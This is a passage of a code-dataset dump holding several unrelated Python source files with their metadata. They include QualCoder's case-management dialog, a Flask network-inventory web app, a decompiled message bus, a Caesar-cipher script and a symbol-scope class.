str(datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"))\n header = values[0]\n values = values[1:]\n # insert cases\n cur = self.app.conn.cursor()\n for v in values:\n item = {'name': v[0], 'memo': \"\", 'owner': self.app.settings['codername'],\n 'date': now_date}\n try:\n cur.execute(\"insert into cases (name,memo,owner,date) values(?,?,?,?)\"\n ,(item['name'],item['memo'],item['owner'],item['date']))\n self.app.conn.commit()\n cur.execute(\"select last_insert_rowid()\")\n item['caseid'] = cur.fetchone()[0]\n self.cases.append(item)\n except Exception as e:\n logger.error(\"item:\" + str(item) + \", \" + str(e))\n # determine attribute type\n attribute_value_type = [\"character\"] * len(header)\n for col, att_name in enumerate(header):\n numeric = True\n for val in values:\n try:\n float(val[col])\n except ValueError:\n numeric = False\n if numeric:\n attribute_value_type[col] = \"numeric\"\n # insert attribute types\n for col, att_name in enumerate(header):\n if col > 0:\n try:\n cur.execute(\"insert into attribute_type (name,date,owner,memo, \\\n valueType, caseOrFile) values(?,?,?,?,?,?)\"\n , (att_name, now_date, self.app.settings['codername'], \"\",\n attribute_value_type[col], 'case'))\n self.app.conn.commit()\n except Exception as e:\n logger.error(_(\"attribute:\") + att_name + \", \" + str(e))\n # insert attributes\n sql = \"select name, caseid from cases\"\n cur.execute(sql)\n name_and_ids = cur.fetchall()\n for n_i in name_and_ids:\n for v in values:\n if n_i[0] == v[0]:\n for col in range(1, len(v)):\n sql = \"insert into attribute (name, value, id, attr_type, date, owner) values (?,?,?,?,?,?)\"\n cur.execute(sql, (header[col], v[col], n_i[1], 'case',\n now_date, self.app.settings['codername']))\n self.app.conn.commit()\n self.load_cases_and_attributes()\n self.fill_tableWidget()\n msg = _(\"Cases and attributes imported from: \") + filename\n self.parent_textEdit.append(msg)\n logger.info(msg)\n\n def add_case(self):\n \"\"\" When add case button pressed, open addItem dialog to get the ase name.\n AddItem dialog checks for duplicate case name.\n New case is added to the model and database.\n Attribute placeholders are assigned to the database for this new case. \"\"\"\n\n ui = DialogAddItemName(self.cases, _(\"Case\"))\n ui.exec_()\n newCaseText = ui.get_new_name()\n if newCaseText is None:\n return\n # update case list and database\n item = {'name': newCaseText, 'memo': \"\", 'owner': self.app.settings['codername'],\n 'date': datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")}\n cur = self.app.conn.cursor()\n cur.execute(\"insert into cases (name,memo,owner,date) values(?,?,?,?)\"\n ,(item['name'],item['memo'],item['owner'],item['date']))\n self.app.conn.commit()\n cur.execute(\"select last_insert_rowid()\")\n item['caseid'] = cur.fetchone()[0]\n # add placeholder attribute values\n cur.execute(\"select name, valuetype from attribute_type where caseOrFile='case'\")\n atts = cur.fetchall()\n for att in atts:\n cur.execute(\"insert into attribute(name,attr_type,value,id,date,owner) \\\n values (?,?,?,?,?,?)\",\n (att[0], \"case\", \"\", item['caseid'], item['date'], item['owner']))\n self.app.conn.commit()\n self.cases.append(item)\n self.fill_tableWidget()\n self.parent_textEdit.append(_(\"Case added: \") + item['name'])\n\n def delete_case(self):\n \"\"\" When delete button pressed, case is deleted from model and database. \"\"\"\n\n tableRows_to_delete = [] # for table widget ids\n caseNames_to_delete = \"\" # for confirmDelete Dialog\n ids_to_delete = [] # for ids for cases and db\n\n for itemWidget in self.ui.tableWidget.selectedItems():\n tableRows_to_delete.append(int(itemWidget.row()))\n ids_to_delete.append(int(self.ui.tableWidget.item(itemWidget.row(),\n self.ID_COLUMN).text()))\n caseNames_to_delete = caseNames_to_delete + \"\\n\" + str(self.ui.tableWidget.item(itemWidget.row(),\n self.NAME_COLUMN).text())\n #logger.debug(\"X:\"+ str(itemWidget.row()) + \" y:\"+str(itemWidget.column()) +\" \"+itemWidget.text() +\" id:\"+str(self.tableWidget_codes.item(itemWidget.row(),3).text()))\n tableRows_to_delete.sort(reverse=True)\n if len(caseNames_to_delete) == 0:\n return\n ui = DialogConfirmDelete(caseNames_to_delete)\n ok = ui.exec_()\n if not ok:\n return\n for id in ids_to_delete:\n for c in self.cases:\n if c['caseid'] == id:\n self.parent_textEdit.append(\"Case deleted: \" + c['name'])\n self.cases.remove(c)\n cur = self.app.conn.cursor()\n #logger.debug(str(id) + \" \"+ str(type(id)))\n cur.execute(\"delete from cases where caseid = ?\", [id])\n cur.execute(\"delete from case_text where caseid = ?\", [id])\n sql = \"delete from attribute where id=? and attr_type='case'\"\n cur.execute(sql, [id])\n self.app.conn.commit()\n self.fill_tableWidget()\n\n def cell_modified(self):\n \"\"\" If the case name has been changed in the table widget update the database. \"\"\"\n\n x = self.ui.tableWidget.currentRow()\n y = self.ui.tableWidget.currentColumn()\n if y == self.NAME_COLUMN: # update case name\n new_text = str(self.ui.tableWidget.item(x, y).text()).strip()\n # check that no other case name has this text and this is not empty\n update = True\n if new_text == \"\":\n update = False\n for c in self.cases:\n if c['name'] == new_text:\n update = False\n if update:\n cur = self.app.conn.cursor()\n cur.execute(\"update cases set name=? where caseid=?\", (new_text, self.cases[x]['caseid']))\n self.app.conn.commit()\n self.cases[x]['name'] = new_text\n else: # put the original text in the cell\n self.ui.tableWidget.item(x, y).setText(self.cases[x]['name'])\n if y > 2: # update attribute value\n value = str(self.ui.tableWidget.item(x, y).text()).strip()\n attribute_name = self.headerLabels[y]\n cur = self.app.conn.cursor()\n cur.execute(\"update attribute set value=? where id=? and name=? and attr_type='case'\",\n (value, self.cases[x]['caseid'], attribute_name))\n self.app.conn.commit()\n\n def cell_selected(self):\n \"\"\" Highlight case text if a file is selected.\n Indicate memo is present, update memo text, or delete memo by clearing text.\n \"\"\"\n\n x = self.ui.tableWidget.currentRow()\n y = self.ui.tableWidget.currentColumn()\n if x == -1:\n self.selected_case = None\n self.ui.textBrowser.clear()\n self.case_text = []\n return\n self.selected_case = self.cases[x]\n # clear case text viewed if the caseid has changed\n if self.caseTextViewed != [] and self.caseTextViewed[0]['caseid'] != self.selected_case['caseid']:\n self.caseTextViewed = []\n self.case_text = []\n self.ui.textBrowser.clear()\n self.unlight()\n #logger.debug(\"Selected case: \" + str(self.selected_case['id']) +\" \"+self.selected_case['name'])\n # get case_text for this file\n if self.selected_file is not None:\n #logger.debug(\"File Selected: \" + str(self.selected_file['id'])+\" \"+self.selected_file['file'])\n self.case_text = []\n cur = self.app.conn.cursor()\n cur.execute(\"select caseid, fid, pos0, pos1, owner, date, memo from case_text where fid = ? and caseid = ?\",\n [self.selected_file['id'], self.selected_case['caseid']])\n result = cur.fetchall()\n for row in result:\n self.case_text.append({'caseid': row[0], 'fid': row[1], 'pos0': row[2],\n 'pos1': row[3], 'owner': row[4], 'date': row[5], 'memo': row[6]})\n self.highlight()\n\n if y == self.MEMO_COLUMN:\n ui = DialogMemo(self.app, _(\"Memo for case \") + self.cases[x]['name'],\n self.cases[x]['memo'])\n ui.exec_()\n self.cases[x]['memo'] = ui.memo\n cur = self.app.conn.cursor()\n cur.execute('update cases set memo=? where caseid=?', (self.cases[x]['memo'], self.cases[x]['caseid']))\n self.app.conn.commit()\n if self.cases[x]['memo'] == \"\":\n self.ui.tableWidget.setItem(x, self.MEMO_COLUMN, QtWidgets.QTableWidgetItem())\n else:\n self.ui.tableWidget.setItem(x, self.MEMO_COLUMN, QtWidgets.QTableWidgetItem(_(\"Yes\")))\n\n def fill_tableWidget(self):\n \"\"\" Fill the table widget with case details. \"\"\"\n\n rows = self.ui.tableWidget.rowCount()\n for c in range(0, rows):\n self.ui.tableWidget.removeRow(0)\n\n self.ui.tableWidget.setColumnCount(len(self.headerLabels))\n self.ui.tableWidget.setHorizontalHeaderLabels(self.headerLabels)\n for row, c in enumerate(self.cases):\n self.ui.tableWidget.insertRow(row)\n self.ui.tableWidget.setItem(row, self.NAME_COLUMN,\n QtWidgets.QTableWidgetItem(c['name']))\n memotmp = c['memo']\n if memotmp is not None and memotmp != \"\":\n self.ui.tableWidget.setItem(row, self.MEMO_COLUMN,\n QtWidgets.QTableWidgetItem(_(\"Yes\")))\n cid = c['caseid']\n if cid is None:\n cid = \"\"\n self.ui.tableWidget.setItem(row, self.ID_COLUMN, QtWidgets.QTableWidgetItem(str(cid)))\n # add the attribute values\n for a in self.attributes:\n for col, header in enumerate(self.headerLabels):\n if cid == a[2] and a[0] == header:\n self.ui.tableWidget.setItem(row, col, QtWidgets.QTableWidgetItem(str(a[1])))\n self.ui.tableWidget.verticalHeader().setVisible(False)\n self.ui.tableWidget.resizeColumnsToContents()\n self.ui.tableWidget.resizeRowsToContents()\n self.ui.tableWidget.hideColumn(self.ID_COLUMN)\n if self.app.settings['showids'] == 'True':\n self.ui.tableWidget.showColumn(self.ID_COLUMN)\n\n def add_file_to_case(self):\n \"\"\" When select file button is pressed a dialog of filenames is presented to the user.\n The entire text of the selected file is then added to the selected case.\n \"\"\"\n\n x = self.ui.tableWidget.currentRow()\n if x == -1:\n QtWidgets.QMessageBox.warning(None, _('Warning'), _(\"No case was selected\"))\n return\n ui = DialogSelectFile(self.source,\n _(\"Select entire file for case: \") + self.cases[x]['name'], \"single\")\n ok = ui.exec_()\n if not ok:\n return\n casefile = ui.get_selected()\n #logger.debug(casefile)\n text_len = 0\n if casefile['fulltext'] is not None:\n text_len = len(casefile['fulltext'])\n newlink = {'caseid': self.cases[x]['caseid'], 'fid': casefile['id'], 'pos0': 0,\n 'pos1': text_len, 'owner': self.app.settings['codername'],\n 'date': datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"), 'memo': \"\"}\n\n cur = self.app.conn.cursor()\n # check for an existing duplicated liked file first\n cur.execute(\"select * from case_text where caseid = ? and fid=? and pos0=? and pos1=?\",\n (newlink['caseid'], newlink['fid'], newlink['pos0'], newlink['pos1']))\n result = cur.fetchall()\n if len(result) > 0:\n QtWidgets.QMessageBox.warning(None, _(\"Already Linked\"),\n _(\"This file has already been linked to this case\"))\n return\n cur.execute(\"insert into case_text (caseid, fid, pos0, pos1, owner, date, memo) values(?,?,?,?,?,?,?)\"\n ,(newlink['caseid'],newlink['fid'],newlink['pos0'],newlink['pos1'],\n newlink['owner'],newlink['date'], newlink['memo']))\n self.app.conn.commit()\n msg = casefile['name'] + _(\" added to case.\")\n QtWidgets.QMessageBox.information(None, _(\"File added to case\"), msg)\n self.parent_textEdit.append(msg)\n\n def select_file(self):\n \"\"\" When open file button is pressed a dialog of filenames is presented to the user.\n The selected file is then used to view and for assigning text portions to cases\n\n Start with clear selection to save confusion of loading file text and not having it\n highlighted for a currently selected case. \"\"\"\n\n self.ui.tableWidget.clearSelection()\n self.case_text = []\n ui = DialogSelectFile(self.source, _(\"Select file to view\"), \"single\")\n ok = ui.exec_()\n if not ok:\n return\n # selected_file is dictionary with id and name\n self.selected_file = ui.get_selected()\n if self.selected_file['fulltext'] is not None:\n chars = str(len(self.selected_file['fulltext']))\n self.ui.label_filename.setText(\"File: \" + self.selected_file['name'] + \" [chars: \" + chars + \"]\")\n self.ui.textBrowser.setText(self.selected_file['fulltext'])\n self.caseTextViewed = []\n self.unlight()\n self.highlight()\n else:\n self.ui.textBrowser.setText(\"\")\n ui = DialogViewImage(self.settings, self.selected_file)\n ui.exec_()\n memo = ui.ui.textEdit.toPlainText()\n if self.selected_file['memo'] != memo:\n self.selected_file['memo'] = memo\n cur = self.app.conn.cursor()\n cur.execute('update source set memo=? where id=?',\n (self.selected_file['memo'], self.selected_file['id']))\n self.app.conn.commit()\n\n def unlight(self):\n \"\"\" Remove all text highlighting from current file. \"\"\"\n\n if self.selected_file is None:\n return\n if self.selected_file['fulltext'] is None:\n return\n cursor = self.ui.textBrowser.textCursor()\n try:\n cursor.setPosition(0, QtGui.QTextCursor.MoveAnchor)\n cursor.setPosition(len(self.selected_file['fulltext']) - 1, QtGui.QTextCursor.KeepAnchor)\n cursor.setCharFormat(QtGui.QTextCharFormat())\n except Exception as e:\n logger.debug((str(e) + \"\\n unlight, text length\" +str(len(self.textBrowser.toPlainText()))))\n\n def highlight(self):\n \"\"\" Apply text highlighting to current file.\n Highlight text of selected case with red underlining.\n #format_.setForeground(QtGui.QColor(\"#990000\")) \"\"\"\n\n if self.selected_file is None:\n return\n if self.selected_file['fulltext'] is None:\n return\n format_ = QtGui.QTextCharFormat()\n cursor = self.ui.textBrowser.textCursor()\n for item in self.case_text:\n try:\n cursor.setPosition(int(item['pos0']), QtGui.QTextCursor.MoveAnchor)\n cursor.setPosition(int(item['pos1']), QtGui.QTextCursor.KeepAnchor)\n format_.setFontUnderline(True)\n format_.setUnderlineColor(QtCore.Qt.red)\n cursor.setCharFormat(format_)\n except:\n msg = \"highlight, text length \" + str(len(self.ui.textBrowser.toPlainText()))\n msg += \"\\npos0:\" + str(item['pos0']) + \", pos1:\" + str(item['pos1'])\n logger.debug(msg)\n\n def view(self):\n \"\"\" View all of the text associated with this case.\n Add links to open image files. \"\"\"\n\n row = self.ui.tableWidget.currentRow()\n if row == -1:\n return\n if self.selected_case is None:\n return\n self.selected_file = None\n self.ui.label_filename.setText(_(\"Viewing text of case: \") + str(self.cases[row]['name']))\n self.ui.textBrowser.clear()\n self.caseTextViewed = []\n cur = self.app.conn.cursor()\n cur.execute(\"select caseid, fid, pos0, pos1, owner, date, memo from case_text where caseid = ? order by fid, pos0\",\n [self.selected_case['caseid'],])\n result = cur.fetchall()\n for row in result:\n caseText = \"\"\n sourcename = \"\"\n mediapath = \"\"\n for src in self.source:\n if src['id'] == row[1] and src['fulltext'] is not None:\n caseText = src['fulltext'][int(row[2]):int(row[3])]\n sourcename = src['name']\n if src['id'] == row[1] and src['fulltext'] is None:\n sourcename = src['name']\n mediapath = src['mediapath']\n self.caseTextViewed.append({'caseid': row[0], 'fid': row[1], 'pos0': row[2],\n 'pos1': row[3], 'owner': row[4], 'date': row[5], 'memo': row[6],\n 'text': caseText, 'sourcename': sourcename, 'mediapath': mediapath})\n\n for c in self.caseTextViewed:\n if c['mediapath'] == '':\n self.ui.textBrowser.append(\"\" + \"File: \" + c['sourcename'] + \" Text: \" +\n str(int(c['pos0'])) + \":\" + str(int(c['pos1'])) + \"\")\n self.ui.textBrowser.append(c['text'])\n elif c['mediapath'][:8] == \"/images/\":\n self.ui.textBrowser.append(' Image: ' + c['sourcename'] + '')\n path = self.app.project_path + c['mediapath']\n url = QtCore.QUrl(path)\n document = self.ui.textBrowser.document()\n image = QtGui.QImageReader(path).read()\n document.addResource(QtGui.QTextDocument.ImageResource, url, QtCore.QVariant(image))\n cursor = self.ui.textBrowser.textCursor()\n image_format = QtGui.QTextImageFormat()\n scaler = 1.0\n scaler_w = 1.0\n scaler_h = 1.0\n if image.width() > 400:\n scaler_w = 400 / image.width()\n if image.height() > 400:\n scaler_h = 400 / image.height()\n if scaler_w < scaler_h:\n scaler = scaler_w\n else:\n scaler = scaler_h\n image_format.setWidth(image.width() * scaler)\n image_format.setHeight(image.height() * scaler)\n image_format.setName(url.toString())\n cursor.insertImage(image_format)\n self.ui.textBrowser.append(\"
\")\n else:\n self.ui.textBrowser.append('
' + _('A/V media: ') + c['sourcename'] + '
')\n path = self.app.project_path + c['mediapath']\n url = QtCore.QUrl(path)\n\n def link_clicked(self, url):\n \"\"\" View image or audio/video media in dialog.\n For A/V, added try block in case VLC bindings do not work. \"\"\"\n\n x = -1\n for i in range(0, len(self.source)):\n if url.toString() == self.source[i]['mediapath']:\n x = i\n if x == -1:\n return\n ui = None\n try:\n if self.source[x]['mediapath'][:6] == \"/video\":\n ui = DialogViewAV(self.app, self.source[x])\n if self.source[x]['mediapath'][:6] == \"/audio\":\n ui = DialogViewAV(self.app, self.source[x])\n except Exception as e:\n logger.debug(str(e))\n print(e)\n QtWidgets.QMessageBox.warning(None, 'view av error', str(e), QtWidgets.QMessageBox.Ok)\n return\n if self.source[x]['mediapath'][:7] == \"/images\":\n ui = DialogViewImage(self.app, self.source[x])\n ui.exec_()\n memo = ui.ui.textEdit.toPlainText()\n if self.source[x]['memo'] != memo:\n self.source[x]['memo'] = memo\n cur = self.app.conn.cursor()\n cur.execute('update source set memo=? where id=?', (self.source[x]['memo'], self.source[x]['id']))\n self.app.conn.commit()\n\n def mark(self):\n \"\"\" Mark selected text in file with currently selected case. \"\"\"\n\n if self.selected_file is None:\n return\n row = self.ui.tableWidget.currentRow()\n if row == -1:\n return\n #selectedText = self.textBrowser.textCursor().selectedText()\n pos0 = self.ui.textBrowser.textCursor().selectionStart()\n pos1 = self.ui.textBrowser.textCursor().selectionEnd()\n # add new item to case_text list and database and update GUI\n item = {'caseid': int(self.cases[row]['caseid']), 'fid': int(self.selected_file['id']),\n 'pos0': pos0, 'pos1': pos1, 'owner': self.app.settings['codername'],\n 'date': datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"), 'memo': \"\"}\n self.case_text.append(item)\n self.highlight()\n\n cur = self.app.conn.cursor()\n # check for an existing duplicated linkage first\n cur.execute(\"select * from case_text where caseid = ? and fid=? and pos0=? and pos1=?\",\n (item['caseid'], item['fid'], item['pos0'], item['pos1']))\n result = cur.fetchall()\n if len(result) > 0:\n QtWidgets.QMessageBox.warning(None, _(\"Already Linked\"),\n _(\"This segment has already been linked to this case\"))\n return\n cur.execute(\"insert into case_text (caseid,fid, pos0, pos1, owner, date, memo) values(?,?,?,?,?,?,?)\"\n ,(item['caseid'],item['fid'],item['pos0'],item['pos1'],item['owner'],item['date'],item['memo']))\n self.app.conn.commit()\n\n def unmark(self):\n \"\"\" Remove case marking from selected text in selected file. \"\"\"\n\n if self.selected_file is None:\n return\n if len(self.case_text) == 0:\n return\n location = self.ui.textBrowser.textCursor().selectionStart()\n unmarked = None\n for item in self.case_text:\n if location >= item['pos0'] and location <= item['pos1']:\n unmarked = item\n if unmarked is None:\n return\n\n # delete from database, remove from case_text and update gui\n cur = self.app.conn.cursor()\n cur.execute(\"delete from case_text where fid=? and caseid=? and pos0=? and pos1=?\",\n (unmarked['fid'], unmarked['caseid'], unmarked['pos0'], unmarked['pos1']))\n self.app.conn.commit()\n if unmarked in self.case_text:\n self.case_text.remove(unmarked)\n self.unlight()\n self.highlight()\n\n def automark(self):\n \"\"\" Automark text in one or more files with selected case. \"\"\"\n\n row = self.ui.tableWidget.currentRow()\n if row == -1:\n QtWidgets.QMessageBox.warning(None, _('Warning'), _(\"No case was selected\"))\n return\n ui = DialogSelectFile(self.source, _(\"Select files to assign case\"), \"many\")\n ok = ui.exec_()\n if not ok:\n return\n files = ui.get_selected()\n if len(files) == 0:\n QtWidgets.QMessageBox.warning(None, _('Warning'), _(\"No file was selected\"))\n return\n #logger.debug(str(files))\n #logger.debug(str(type(files)))\n filenames = \"\"\n for f in files:\n filenames += f['name'] + \" \"\n ui = DialogGetStartAndEndMarks(self.cases[row]['name'], filenames)\n ok = ui.exec_()\n if not ok:\n return\n start_mark = ui.get_start_mark()\n end_mark = ui.get_end_mark()\n if start_mark == \"\" or end_mark == \"\":\n QtWidgets.QMessageBox.warning(None, _('Warning'), _('Cannot have blank text marks'))\n return\n warnings = 0\n for f in files:\n cur = self.app.conn.cursor()\n cur.execute(\"select name, id, fulltext, memo, owner, date from source where id=?\",\n [f['id']])\n currentfile = cur.fetchone()\n text = currentfile[2]\n text_starts = [match.start() for match in re.finditer(re.escape(start_mark), text)]\n text_ends = [match.start() for match in re.finditer(re.escape(end_mark), text)]\n #logger.debug(textStarts, textEnds)\n #add new code linkage items to database\n for startPos in text_starts:\n pos1 = -1 # default if not found\n textEndIterator = 0\n try:\n while startPos >= text_ends[textEndIterator]:\n textEndIterator += 1\n except IndexError:\n textEndIterator = -1\n warnings += 1\n logger.warning(\"Could not find end mark: \" + f['name'] + \" \" + end_mark)\n\n if textEndIterator >= 0:\n pos1 = text_ends[textEndIterator]\n item = {'caseid': int(self.cases[row]['caseid']), 'fid': int(f['id']),\n 'pos0': startPos, 'pos1': pos1,\n 'owner': self.app.settings['codername'],\n 'date': datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"), 'memo': \"\"}\n\n cur = self.app.conn.cursor()\n cur.execute(\"insert into case_text (caseid,fid,pos0,pos1,owner,date,memo) values(?,?,?,?,?,?,?)\"\n ,(item['caseid'], item['fid'], item['pos0'], item['pos1'],\n item['owner'], item['date'], item['memo']))\n self.app.conn.commit()\n if warnings > 0:\n QtWidgets.QMessageBox.warning(None, _('Warning'),\n _(\"End mark did not match up: \") + str(warnings))\n self.ui.tableWidget.clearSelection()\n\n\nclass DialogGetStartAndEndMarks(QtWidgets.QDialog):\n ''' This dialog gets the start and end mark text to allow file text to be\n automatically assigned to the currently selected case.\n It requires the name of the selected case and the filenames - for display purposes only.\n Methods return the user's choices for the startmark text and the endmark text.\n '''\n\n caseName = \"\"\n\n def __init__(self, case_name, filenames):\n\n QtWidgets.QDialog.__init__(self)\n self.ui = Ui_Dialog_StartAndEndMarks()\n self.ui.setupUi(self)\n self.ui.label_case.setText(case_name)\n self.ui.label_files.setText(\"Files: \" + str(filenames))\n\n def get_start_mark(self):\n return str(self.ui.lineEdit_startmark.text())\n\n def get_end_mark(self):\n return str(self.ui.lineEdit_endmark.text())\n\n\nif __name__ == \"__main__\":\n app = QtWidgets.QApplication(sys.argv)\n ui = DialogGetStartAndEndMarks(\"case one\", [\"file 1\",\"file 2\"])\n ui.show()\n sys.exit(app.exec_())\n\n","sub_path":"qualcoder/cases.py","file_name":"cases.py","file_ext":"py","file_size_in_byte":37555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"326193188","text":"from flask import render_template, jsonify, send_file, request\nfrom www import infoset\nfrom os import listdir, walk, path, makedirs, remove\nfrom infoset.utils.rrd.rrd_xlate import RrdXlate\nimport yaml\n\n\n@infoset.route('/')\ndef index():\n hosts = getHosts()\n return render_template('index.html',\n hosts=hosts)\n \n@infoset.route('/search')\ndef search():\n return render_template('search.html', results=[])\n\n\n@infoset.route('/search/')\ndef searchq(query):\n info = getInfo() #This is a list of dictionaries\n hosts = getHosts()\n results = [] #results of search query\n\n #if query is a mac address since ips normally start with one\n if query[0] != '1':\n query = query.replace('.',\"\")\n query = query.replace(':',\"\")\n query = query.replace('-',\"\")\n\n for data in info:\n for ip, mac in data.items():\n if ip == query:\n #print(\"%s | %s | %s\" %(data['host'],ip,mac))\n results.append((\"Host: %s | IP Address: %s | MAC Address: %s\"\n +\" | DNS: | Port Label: \")\n %(data['host'],ip,mac))\n elif mac == query:\n #print(\"%s | %s | %s\" %(data['host'],ip,mac))\n results.append((\"Host: %s | IP Address: %s | MAC Address: %s\"\n +\" | DNS: | Port Label: \")\n %(data['host'],ip,mac))\n\n if results == []:\n results.append(\"No Results Found\")\n\n return render_template('search.html', results=results)\n\n\n@infoset.route('/hosts')\ndef hosts():\n hosts = getHosts()\n return jsonify(hosts)\n\n\n@infoset.route('/hosts/')\ndef host(host):\n filename = host + \".yaml\"\n filepath = path.join(\"./www/static/yaml/\", filename)\n yaml_dump = {}\n with open(filepath, 'r') as stream:\n try:\n yaml_dump = yaml.load(stream)\n except Exception as e:\n raise e\n return jsonify(yaml_dump)\n\n\n@infoset.route('/hosts//layer1')\ndef layerOne(host):\n filename = host + \".yaml\"\n filepath = path.join(\"./www/static/yaml/\", filename)\n yaml_dump = {}\n with open(filepath, 'r') as stream:\n try:\n yaml_dump = yaml.load(stream)\n except Exception as e:\n raise e\n layer1 = yaml_dump['layer1']\n return jsonify(layer1)\n\n\n@infoset.route('/hosts//layer2')\ndef layerTwo(host):\n filename = host + \".yaml\"\n filepath = path.join(\"./www/static/yaml/\", filename)\n yaml_dump = {}\n with open(filepath, 'r') as stream:\n try:\n yaml_dump = yaml.load(stream)\n except Exception as e:\n raise e\n layer2 = yaml_dump['layer2']\n return jsonify(layer2)\n\n\n@infoset.route('/devices')\ndef devices():\n hosts = getHosts()\n devices = getDevices()\n return render_template('devices.html',\n hosts=hosts,\n devices=devices)\n\n@infoset.route('/devices/')\ndef device_details(uid):\n devices = getDevices()\n device_details = getDeviceDetails(uid)\n device_path = \"./www/static/devices/linux/\" + str(uid)\n rrd_root = RrdXlate(device_path)\n rrd_root.rrd_graph()\n return render_template('device.html',\n uid=uid,\n devices=devices,\n details=device_details)\n\n@infoset.route('/receive/', methods=[\"POST\"])\ndef receive(uid):\n device_path = \"./www/static/devices/linux/\" + str(uid)\n content = request.json\n if not path.exists(device_path):\n makedirs(device_path)\n\n active_yaml_path = device_path + \"/active.yaml\"\n # Out with the old\n remove(active_yaml_path)\n # In with the new\n with open(active_yaml_path, \"w+\") as active_file:\n active_file.write(yaml.dump(content, default_flow_style=False))\n active_file.close()\n\n rrd_root = RrdXlate(\"./www/static/devices/linux/\")\n\n rrd_root.rrd_update()\n return \"Recieved\"\n\n\ndef getHosts():\n hosts = {}\n for root, directories, files in walk('./www/static/yaml'):\n for filename in files:\n filepath = path.join(root, filename)\n hosts[filename[:-5]] = filepath # Add it to the list.\n return hosts\n\ndef getDeviceDetails(uid):\n active_yaml = {}\n filepath=\"./www/static/devices/linux/\" + str(uid) + \"/active.yaml\"\n with open(filepath, 'r') as stream:\n try:\n active_yaml = yaml.load(stream)\n except Exception as e:\n raise e\n return active_yaml\n\ndef getDevices():\n active_yamls = {}\n devices = []\n root=\"./www/static/devices/linux/\"\n directories = [d for d in listdir(root) if path.isdir(path.join(root, d))]\n\n for directory in directories:\n filepath = \"./www/static/devices/linux/\" + directory + \"/active.yaml\"\n active_yamls[directory] = filepath\n\n with open(filepath, 'r') as stream:\n try:\n yaml_dump = yaml.load(stream)\n except Exception as e:\n raise e\n devices.append(yaml_dump)\n return devices\n \ndef getLayer(host, layer):\n filename = host + \".yaml\"\n filepath = path.join(\"./www/static/yaml/\", filename)\n yaml_dump = {}\n with open(filepath, 'r') as stream:\n try:\n yaml_dump = yaml.load(stream)\n except Exception as e:\n raise e\n layer = yaml_dump['layer'+str(layer)]\n return layer\n\ndef getInfo():\n hosts = getHosts()\n info = []\n for host in hosts.keys():\n for val in getLayer(host, 3).values():\n val['host'] = host\n info.append(val)\n return info\n","sub_path":"www/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"82495817","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/sutekh/base/gui/MessageBus.py\n# Compiled at: 2019-12-11 16:37:48\n\"\"\"Message Bus for Sutekh\"\"\"\nCONFIG_MSG, CARD_TEXT_MSG, DATABASE_MSG = range(3)\n\nclass MessageBus(object):\n \"\"\"The actual message bus\"\"\"\n _dSubscriptions = {}\n\n @classmethod\n def subscribe(cls, oObject, sSignalName, fCallback):\n \"\"\"Subscribe to a given signal on an object\"\"\"\n if oObject not in cls._dSubscriptions:\n cls._dSubscriptions[oObject] = {}\n dCallbacks = cls._dSubscriptions[oObject]\n if sSignalName not in dCallbacks:\n dCallbacks[sSignalName] = []\n dCallbacks[sSignalName].append(fCallback)\n\n @classmethod\n def publish(cls, oObject, sSignalName, *args, **kwargs):\n \"\"\"Publish the signal to any subscribers\"\"\"\n if oObject not in cls._dSubscriptions:\n return\n dCallbacks = cls._dSubscriptions[oObject]\n if sSignalName not in dCallbacks:\n return\n for fCallback in dCallbacks[sSignalName]:\n fCallback(*args, **kwargs)\n\n @classmethod\n def unsubscribe(cls, oObject, sSignalName, fCallback):\n \"\"\"Remove a callback from the list\"\"\"\n if oObject not in cls._dSubscriptions:\n return\n dCallbacks = cls._dSubscriptions[oObject]\n if sSignalName not in dCallbacks:\n return\n if fCallback not in dCallbacks[sSignalName]:\n return\n dCallbacks[sSignalName].remove(fCallback)\n\n @classmethod\n def clear(cls, oObject):\n \"\"\"Clear all callbacks associated with the given object\"\"\"\n if oObject in cls._dSubscriptions:\n del cls._dSubscriptions[oObject]","sub_path":"pycfiles/Sutekh-1.0.0-py2.7/MessageBus.py","file_name":"MessageBus.py","file_ext":"py","file_size_in_byte":1844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"185773581","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[87]:\n\n\ndef encrypt(k, m):\n lst = [chr((ord(i)+k)%65536) for i in m]\n return ''.join(lst)\n\n\ndef decrypt(k, c):\n lst = [chr((ord(i)-k)%65536) for i in c]\n return ''.join(lst)\n\ncode = encrypt(3, 'abcdefgh12345')\nprint(\"Encrypted message: \" + code)\n\nmessage = decrypt(3, code)\nprint(\"Decrypted message: \" + message)\n\n","sub_path":"сaesar_cipher.py","file_name":"сaesar_cipher.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"198719202","text":"from collections import OrderedDict\nfrom six import iteritems\n\n\nclass Scope:\n def __init__(self, *parents):\n self.parents = list(parents)\n self.symbols = OrderedDict()\n self.attrs = set()\n self.owner = None\n\n def add_symbol(self, name, symbol):\n self.symbols[name] = symbol\n\n def find_symbol(self, name, strict=False):\n symbol = self.symbols.get(name)\n if symbol is None:\n for parent in self.parents:\n if parent is None:\n continue\n symbol = parent.find_symbol(name, strict)\n if symbol is not None:\n break\n if strict:\n break\n return symbol\n\n def __str__(self):\n s = ', '.join(['%s -> %s' % (name, value) for name, value in iteritems(self.symbols)])\n if len(self.parents) == 0:\n return s\n if self.parents[0] is None:\n return s\n ps = str(self.parents[0])\n if len(ps) == 0:\n return s\n return '%s, %s' % (s, ps)\n","sub_path":"c_ext/scope.py","file_name":"scope.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} 